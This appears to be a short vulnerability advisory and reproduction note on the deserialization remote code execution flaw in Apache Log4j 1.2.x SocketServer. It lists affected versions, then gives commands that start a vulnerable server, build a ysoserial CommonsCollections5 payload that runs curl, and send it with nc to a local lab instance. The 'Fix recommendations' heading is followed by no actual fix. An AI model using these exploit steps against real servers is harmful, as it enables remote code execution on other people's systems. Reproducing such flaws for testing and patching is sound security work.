
Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
Vulnerability warning reference link: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ
Apache Log4j is a Java-based open-source logging tool developed by the Apache Software Foundation. A deserialization remote code execution vulnerability exists in Apache Log4j 1.2.X series. Attackers can exploit this vulnerability to execute arbitrary malicious commands. Log4j 1.2.X includes a SocketServer class that is vulnerable to deserialization of untrusted data. When listening to untrusted network traffic containing log data, this class can be exploited to remotely execute arbitrary code when combined with deserialization gadgets. The impact includes the latest version.
High
Affected versions 1.2.4 <= Apache Log4j <= 1.2.17 (latest)
Fix recommendations
As early as Apache Log4j 2.8.1, a deserialization remote code execution vulnerability (CVE-2017-5645) existed, triggered via the class org.apache.logging.log4j.core.net.server.TcpSocketServer. In Apache Log4j 1.2.X, the vulnerable class changed to org.apache.log4j.net.SocketServer
Through online research, it was found that starting the log4j 1.X SocketServer is done via a java command, not through Java code. (If there are other methods, please let me know.)
Similarly, you need to download the affected jar package as well as a jar package that allows code execution, and set them in the environment variable (the following is for Windows environment). Start the service, passing 3 parameters: a port, the log4j configuration file, and the lcf directory:
java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./
java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./
java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin
nc 127.0.0.1 4560 < log4j.curl.bin
Download related jars: https://github.com/shadow-horse/Vulenvironment/libs